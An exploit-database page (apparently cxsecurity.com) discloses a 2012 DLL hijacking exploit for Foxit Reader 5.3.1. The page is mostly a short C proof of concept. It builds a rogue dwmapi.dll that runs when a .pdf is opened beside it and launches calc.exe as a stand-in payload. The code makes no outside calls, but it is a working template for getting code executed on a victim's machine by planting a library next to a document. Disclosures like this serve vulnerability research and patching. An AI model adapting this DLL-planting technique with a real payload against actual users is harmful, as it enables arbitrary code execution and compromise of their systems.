Foxit Reader 5.3.1(dwmapi.dll) DLL Hijacking Exploit

2012.08.23
Credit: coolkaveh
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title: foxit reader 5.3.1(dwmapi.dll) DLL Hijacking Exploit Date: 2012-08-23 Author: coolkaveh coolkaveh () rocketmail com Greets To Mohammad Morteza Sanaie sanaie.morteza () gmail com Https://twitter.com/coolkaveh Vendor Homepage: http://www.foxitsoftware.com/ Version: 5.3.1.0606 Tested on: windows XP Sp3 ENG --------------------------------------------------------- # Vulnerable: foxit reader.exe --------------------------------------------------------- # Vulnerable extensions: .pdf --------------------------------------------------------- # Vulnerable Dll: dwmapi.dll --------------------------------------------------------- #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; }

References:

http://www.foxitsoftware.com/
https://twitter.com/coolkaveh


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top